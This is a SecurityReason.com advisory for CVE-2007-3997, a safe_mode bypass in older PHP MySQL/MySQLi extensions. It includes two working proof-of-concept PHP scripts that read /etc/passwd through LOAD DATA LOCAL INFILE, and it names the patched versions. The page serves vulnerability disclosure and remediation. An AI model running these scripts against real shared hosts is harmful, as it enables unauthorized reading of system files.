SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

PHP MySQL/MySQLi Safe Mode Bypass Vulnerability


Arrow  SecurityAlert : 3102
Arrow  CVE : CVE-2007-3997
Arrow  SecurityRisk : Medium  Security Risk Medium  (About)
Arrow  Remote Exploit : No
Arrow  Local Exploit : Yes
Arrow  Exploit Available : Yes
Arrow  Credit : Mattias Bengtsson & Philip Olausson
Arrow  Published : 08.09.2007

Arrow  Affected Software : x <= PHP 5.2.3
x <= PHP 4.4.7



Arrow  Advisory Content :  

PHP MySQL/MySQLi Safe Mode Bypass Vulnerability

Affected Products:
<= PHP 5.2.3
<= PHP 4.4.7

Authors:
Mattias Bengtsson <mattias@secweb.se>
Philip Olausson <po@secweb.se>

Reported:
2007-06-05

Released:
2007-08-30

CVE:
CVE-2007-3997

Issue:

A vulnerability exists in PHP's MySQL and MySQLi extenstions which can be
used to bypass PHP's safe_mode security restriction.

Description:

PHP is a widely-used general-purpose scripting language that is especially
suited for Web development and can be embedded into HTML.

Details:

By using MySQLs LOCAL INFILE we could bypass PHP's safe_mode security
restriction. An important thing here is that we can't rely on the shared
hosts MySQLds local-infile=0 option. This because of it being a server
option, so it will not have any effect on the client. To disable this
option for MySQL we need to compile libmysqlclient with
--disable-local-infile, or remove the CLIENT_LOCAL_FILES flag while
connecting. PHP does this when open_basedir are in effect but lacks a check
for safe_mode.

For MySQLi compiling with --disable-local-infile won't help because we
could just reenable it with mysqli->options(MYSQLI_OPT_LOCAL_INFILE, 1);

Proof Of Concepts:

MySQL:

<?php

file_get_contents('/etc/passwd');

$l = mysql_connect("localhost", "root");
mysql_query("CREATE DATABASE a");
mysql_query("CREATE TABLE a.a (a varchar(1024))");
mysql_query("GRANT SELECT,INSERT ON a.a TO 'aaaa'@'localhost'");
mysql_close($l); mysql_connect("localhost", "aaaa");

mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a");

$result = mysql_query("SELECT a FROM a.a");
while(list($row) = mysql_fetch_row($result))
print $row . chr(10);

?>

MySQLi:

<?php

function r($fp, &$buf, $len, &$err) {
print fread($fp, $len);
}

$m = new mysqli('localhost', 'aaaa', '', 'a');
$m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
$m->set_local_infile_handler("r");
$m->query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a");
$m->close();

?>

Impact:

This issue could have major impact on shared hosting systems.

Solution:

Upgrade PHP to 5.2.4 or 4.4.8





Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc:fts_*() Multiple Denial of Service

Security Risk Medium- 2009-10-02

The fts functions are provided for traversing UNIX file hierarchies...

Apache RSS Apache Alert

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion in work
   directory

» Apache Tomcat 6.0.20 and
   5.5.28 insecure partial
   deploy after failed
   undeploy

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion and/or
   alteration

PHP RSS PHP Alert

» PHP 5.2.12/5.3.1
   session.save_path
   safe_mode and
   open_basedir bypass

» PHP 5.2.12/5.3.1 Multiple
   Vulnerabilities

» PHP 5.2.11 libgd multiple
   vulnerabilities

» PHP 5.2.11 tempnam()
   safe_mode bypass

Copyright © SecurityReason.com. All Rights Reserved.